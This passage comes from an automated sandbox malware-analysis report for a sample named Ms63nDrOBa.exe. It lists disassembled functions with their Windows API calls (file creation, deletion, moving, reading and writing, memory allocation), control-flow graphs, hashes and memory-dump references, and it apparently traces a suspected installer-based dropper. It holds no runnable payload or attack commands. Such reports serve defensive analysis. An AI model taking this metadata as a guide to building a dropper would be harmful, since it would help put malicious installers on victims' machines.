                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
                                                  • Instruction ID: 536d658b2d5626a072540831630168b43a4966d71debd26089b563c1caab560b
                                                  • Opcode Fuzzy Hash: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
                                                  • Instruction Fuzzy Hash: 4321B031904108EADF11AFA4CE49A9D7A71BF84358F20423FF201B91E1CBBD8982961E
                                                  Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 588 401ba0-401bab 589 401bf1-401bf4 588->589 590 401bad-401bb0 588->590 591 401bf6-401bf8 589->591 592 401c1b-401c31 GlobalAlloc call 406571 589->592 593 401bb6-401bba 590->593 594 40238f-4023a7 call 406571 call 405b94 590->594 596 402933-40293a 591->596 597 401bfe-401c16 call 406534 GlobalFree 591->597 603 401c36-401c43 592->603 593->590 599 401bbc-401bbe 593->599 600 402c2f-402c38 594->600 610 402c3a-402c3e 594->610 596->600 597->600 599->594 604 401bc4-402a9e call 406534 * 3 599->604 600->610 603->594 603->600 604->600
                                                  APIs
                                                  • GlobalFree.KERNEL32(00893338), ref: 00401C10
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: 10.0.19045.False
                                                  • API String ID: 3394109436-2006975710
                                                  • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                  • Instruction ID: ebda21c3d1e0d5701a49ae815e8da7541a6b67fff49d9363c78ae17fdfc2c87a
                                                  • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                  • Instruction Fuzzy Hash: 0D21C973904114EBDB20EBA8EE85A5E72F4AB04324755053FF542B72D0C67CD8418F5D
                                                  Function 00405BF8 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 618 405bf8-405c09 call 405fff 621 405c39 618->621 622 405c0b-405c11 618->622 623 405c3b-405c3d 621->623 624 405c13-405c19 RemoveDirectoryW 622->624 625 405c1b DeleteFileW 622->625 626 405c21-405c23 624->626 625->626 627 405c25-405c28 626->627 628 405c2a-405c2f 626->628 627->623 628->621 629 405c31-405c33 SetFileAttributesW 628->629 629->621
                                                  APIs
                                                    • Part of subcall function 00405FFF: GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                                                    • Part of subcall function 00405FFF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C13
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C1B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C33
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                  • String ID:
                                                  • API String ID: 1655745494-0
                                                  • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                  • Instruction ID: 5e01d24d9a9add2734d853181832f52676860c459c8436f1574cfa514314cc42
                                                  • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                  • Instruction Fuzzy Hash: 34E0653111DB9556E3206B359E0CA6B29D8DF86724F05093EF491B21D0DB78484A8AAD
                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 630 401389-40138e 631 4013fa-4013fc 630->631 632 401390-4013a0 631->632 633 4013fe 631->633 632->633 635 4013a2-4013a3 call 401434 632->635 634 401400-401401 633->634 637 4013a8-4013ad 635->637 638 401404-401409 637->638 639 4013af-4013b7 call 40136d 637->639 638->634 642 4013b9-4013bb 639->642 643 4013bd-4013c2 639->643 644 4013c4-4013c9 642->644 643->644 644->631 645 4013cb-4013f4 MulDiv SendMessageW 644->645 645->631
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                  • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                                  • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                  • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                                  Function 00405A88 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 646 405a88-405ad2 CreateDirectoryW 647 405ad4-405ad6 646->647 648 405ad8 GetLastError 646->648 649 405ade-405adf 647->649 648->649
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                                                  • GetLastError.KERNEL32 ref: 00405AD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                  • Instruction ID: a317670bc0344c02bc4a283170babb3afb7c1cf0ece08f5f419864d791fc675b
                                                  • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                  • Instruction Fuzzy Hash: 6CF0F4B0D0064EDADB00DFA4C6487EFBBB4EB04309F10812AD941B6281D7B882488FA9
                                                  Function 00406928 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406955
                                                    • Part of subcall function 004068B8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                                                    • Part of subcall function 004068B8: wsprintfW.USER32 ref: 0040690A
                                                    • Part of subcall function 004068B8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                  • Instruction ID: 3558e7e07fc8bc3cb8e2ee1445b58ac947b9e1d3522fe80aecf0cccf78f5b58a
                                                  • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                  • Instruction Fuzzy Hash: C7E08673504211ABD2106A705E04C2777AD9F85750302443EF946F2140D774DC32A76D
                                                  Function 00406024 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                  • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                  • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                  • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                  Function 00405FFF Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                  • Instruction ID: b044de85d095277e3e8e37393dee7a1aab5cccde4b3e14dcc7f467a135196144
                                                  • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                  • Instruction Fuzzy Hash: C7D0C972505220AFC2103B28EE0889BBB55DB54271B028A35FCA9A22B0CB304C669A94
                                                  Function 00403B2C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00403A5F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B37
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp\, xrefs: 00403B4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\
                                                  • API String ID: 2962429428-1087048941
                                                  • Opcode ID: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                                                  • Instruction ID: 56a8d231df6e1f4919b80352f74fca15e45824bb5242f2e67795a820b0309f86
                                                  • Opcode Fuzzy Hash: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                                                  • Instruction Fuzzy Hash: C9C0123054470496D5247F799D4FE453A249740739B908325B2B9B40F2C73C5659596D
                                                  Function 00405AE2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AF6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction ID: 7753466ba62b5dbc1ec3a25bc90d7dba0bbd887294648da7d021985784af3e89
                                                  • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                  • Instruction Fuzzy Hash: 9FC04C70308906DAD6505B619F4871B7950AB50741F154939A986E50E0DA748495EE2D
                                                  Function 004060D6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040347A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction ID: b33f9baa58445403e377b25cdb553cbb5220209f8a97e81f67fdd09438c35695
                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction Fuzzy Hash: 80E08C3225021ABBDF109F54CC00EEB3B6CEB043A0F018437F916E2060D670E930A7A8
                                                  Function 004060A7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034C4,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060BB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction ID: 39ae2bf48dd7ef05cc95990c5189398c44bf694af0d2be0d7958e68ccb6b0415
                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction Fuzzy Hash: 54E08C3226126AABCF10DF508C00EEB3BACEF043A0F014432F912E3080DA30E92197A9
                                                  Function 004062F4 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
                                                    • Part of subcall function 0040617A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                                                    • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                                    • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                                                    • Part of subcall function 0040617A: wsprintfA.USER32 ref: 004061F9
                                                    • Part of subcall function 0040617A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                                                    • Part of subcall function 0040617A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                                                    • Part of subcall function 0040617A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                                                    • Part of subcall function 0040617A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
